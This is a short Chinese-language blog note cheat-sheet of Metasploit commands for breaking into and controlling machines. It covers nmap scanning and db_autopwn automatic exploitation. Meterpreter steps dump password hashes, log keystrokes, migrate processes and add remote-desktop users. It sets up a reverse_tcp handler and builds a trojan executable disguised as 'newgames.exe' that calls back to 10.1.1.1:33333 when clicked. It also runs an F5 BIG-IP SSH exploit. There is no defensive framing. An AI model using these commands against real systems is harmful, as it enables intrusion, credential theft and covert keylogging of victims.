0

msf metasploit一些常用命令

已有 3,354 人阅读此文 - -

msf metasploit一些常用命令
笔记上记得 先放上来 慢慢补充
rdesktop ip 远程桌面


msfconsole

hosts 数据库
host -d 删除所有数据

db_nmap -T Aggressive -sV -n -O -v
nmap -sS -Pn 192.168.1.1 // -sS 使用它来进行一次隐蔽的TCP 扫描 -Pn 它会告诉nmap 不使用ping 来预先确认主机属否存活

调用nmap扫描 -T Aggressive 快速扫描 -o判断造作系统 -sv服务及版本 -v 详细消息

db_service 查看服务

load db_autopwn.rb

db_autopwn 自动攻击 db_autopwn -p -t -e -I指定目标

db_autopwn -p -t -e -r

-e 是开始攻击,-t 是列出所有的匹配的模块,-r 是使用一个反弹式的
shell –p 是在端口的基础上来选择攻击模块

sessions -i 查看活动连接
sessions -i id 连接
getuid 查看权限
sysinfo 查看系统信息
run hashdump 导出帐号
ps 查看系统进程
migrate 进程uid 进入某个进程 迁移进程
keyscan_start 键盘扫描 键盘记录
keyscan_dump 输出键盘记录
keyscan_stop
run getgui -e 打开远程桌面
run getgui -u 用户名 -p 密码 添加用户

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 反向tcp连接
set LHOST 10.1.1.1
set LPORT 33333
exploit

制造离线攻击
cd /pentest/exploits/frameworks3
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=33333 X > /tmp/newgames.exe
建立文件 点击后 自动连接 10.1.1.1 33333端口

选择模块攻击

search 关键词
use exploit/linux/ssh/f5_bigip_known_privkey
show options
set RHOST ip
set RPORT 端口
set payload cmd/unix/interact
exploit

0
相关文章!